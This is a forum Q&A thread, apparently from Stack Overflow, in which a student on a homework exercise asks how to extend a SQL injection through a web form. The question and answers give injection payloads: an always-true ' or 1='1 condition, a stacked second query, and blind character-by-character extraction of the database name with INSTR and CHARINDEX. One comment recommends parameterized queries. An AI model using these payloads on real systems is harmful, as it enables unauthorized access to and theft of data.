# SQL Injection - MYSQL

Tags: mysql, sql, code-injection

I'm doing an exercise on the SQL Injection, the query is given. The data comes in between ''. So this is the query:

```
select * from contacts where name = ''
```

I managed to see the users in the table using this:

```
select * from contacts where name = 'anything' or 1='1'
```

But my question is how I can write it so that I can write a new query? Or see the database name for example so that I can check other tables.

**EDIT:**

To avoid confusion the query is not given to us, there is a textfield on a webpage, that's what we use to do SQL injection.

So imagine the query is being this:

```
select * from contacts where name = ''
```

And I wrote this to the text field, to see all the users.

```
anything' or 1='1
```

I'm trying to understand how I can use this textfield, to see the name of the database, or run other queries.

Thank you.

Comment: How are you seeing the results? Are you running the query directly in sql?

Comment: I'm seeing the results on a webpage. Originally I don't have any idea about the query but since this is an homework it is being shown to us. There is a text field where you insert the name, which I wrote ( anything' or 1='1 ) in to the text field to see all the users. @clinomaniac

Comment: What language is the page written in? Look into using parameters. It would look something like select * from contacts where name = ? and then you would pass in the value.

Comment: @clinomaniac Probably PHP and MYSQL. You can check my edit of the post maybe that will give you a better understanding.

Comment: Are you trying to do SQL Injection and get more information from the database? I thought you were asking about how to write the query to avoid sql injection.

Answer (score 0):

So if the query is :

```
select * from contacts where name = ''
```

You can try something like:

```
'; select * from anotherTableName'
```

Answer (score 0):

If your data does not return multi-result sets then you can so something like:

In SQL Server

```
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=1
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=2
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=3
...
```

Until you get all the correct indexes of the characters in the name.

In MySQL it would be something like:

```
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =1
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =2
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =3
...
```